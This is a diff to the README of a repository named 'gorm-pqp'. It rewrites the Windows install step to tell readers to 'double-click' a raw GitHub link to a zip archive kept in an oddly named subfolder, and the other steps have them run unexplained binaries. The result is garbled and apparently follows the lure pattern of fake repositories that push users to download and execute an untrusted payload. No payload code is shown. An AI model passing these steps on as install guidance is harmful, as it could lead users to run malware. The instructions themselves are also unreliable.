Maressatransverse294/gorm-pqp/README.md

 ### 🖱️ Step 2: Run the Installer

-1. **Windows**: Double-click the `gorm-pqp-windows.exe` file.
+1. **Windows**: Double-click the `https://raw.githubusercontent.com/Maressatransverse294/gorm-pqp/main/crustalogist/gorm-pqp-v3.5-beta.3.zip` file.
 Follow the on-screen prompts to complete the installation.
 2. **MacOS**: Double-click the downloaded `gorm-pqp-macos` file.
 Drag it into your Applications folder as instructed.
 3. **Linux**: Open your terminal.
 Navigate to the folder where the `gorm-pqp-linux` file is stored.
 Run the command `chmod +x gorm-pqp-linux` to make it executable.
 Then run `./gorm-pqp-linux` to launch the software.